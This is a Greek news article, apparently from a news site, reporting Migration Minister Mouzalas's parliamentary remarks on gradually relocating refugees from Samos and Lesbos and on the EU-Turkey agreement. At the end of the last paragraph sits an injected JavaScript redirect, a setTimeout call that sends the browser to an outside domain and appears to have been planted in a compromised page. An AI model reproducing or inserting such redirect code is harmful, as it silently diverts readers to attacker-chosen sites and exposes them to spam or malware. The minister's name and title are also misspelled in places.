Μουζάλας: Σταδιακά να γίνει ο απεγκλωβισμός προσφύγων από τα νησιά

0
5

 

Απαντώντας σε επίκαιρες ερωτήσεις των βουλευτή Σάμου του ΣΥΡΙΖΑ, Δημήτρη Σεβαστάκη και του βουλευτή του ΚΚΕ, Χρήστου Κατσώτη, σχετικά με το προσφυγικό και μεταναστευτικό πρόβλημα, ο υπυοργός Μεταναστευτικής Πολιτικής Γιάννης πυζάλας τόνισε πως ο απεγκλωβισμός των προσφύγων και των μεταναστών από τα νησιά πρέπει να γίνει σταδιακά και όχι κραυγαλέα, με άμεση προτεραιότητα στις ευάλωτες ομάδες, διαφορετικά θα τεθεί σε κίνδυνο η συμφωνία ΕΕ-Τουρκίας.

Όπως τόνισε στη Βουλή σχολιάζοντας τις αντιδράσεις στα νησιά, αναγνώρισε ότι υπάρχει «μία κοινωνική δυσφορία», που όπως είπε, «εξαπλώνεται και στον μέσο πολίτη, όπου υπάρχουν ακραίες ομάδες και ακροδεξιά στοιχεία που αποδίδονται σε προβοκατόρικες ενέργειες», κατονομάζοντας τη Χρυσή Αυγή.

«Θα μπορούσαμε να τους πάρουμε από τη Σάμο, αλλά θα επέφερε ρήξη με την Τουρκία και θα πηγαίναμε στη χθεσινή κατάσταση. Θα έρχονταν κάθε μέρα 2.000 με 4.000 στα νησιά και θα γυρνάγαμε στην περσινή κατάσταση. Εμείς αυτό θα προσπαθήσουμε να το σταματήσουμε. Ο απεγκλωβισμός έγινε με επιτυχία στη Σάμο και στη Μυτιλήνη και 1.500 άτομα τους φέρνουμε στην Αθήνα. Αυτό γίνεται σιγά-σιγά και όχι κραυγαλέα. Αυτό θα βοηθήσει, ώστε να πάψουν οι χώροι αυτοί να είναι αποθήκες και να σταματήσουν» επεσήμανε και κάλεσε τόσο τους νησιώτες όσο και τα κόμματα να μην αντιδρούν, αλλά να βοηθήσουν στη δημιουργία νέων hot spots γιατί είναι η μόνη λύση σε αυτήν τη φάση, προκειμένου να γίνει αποσυμφόρηση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here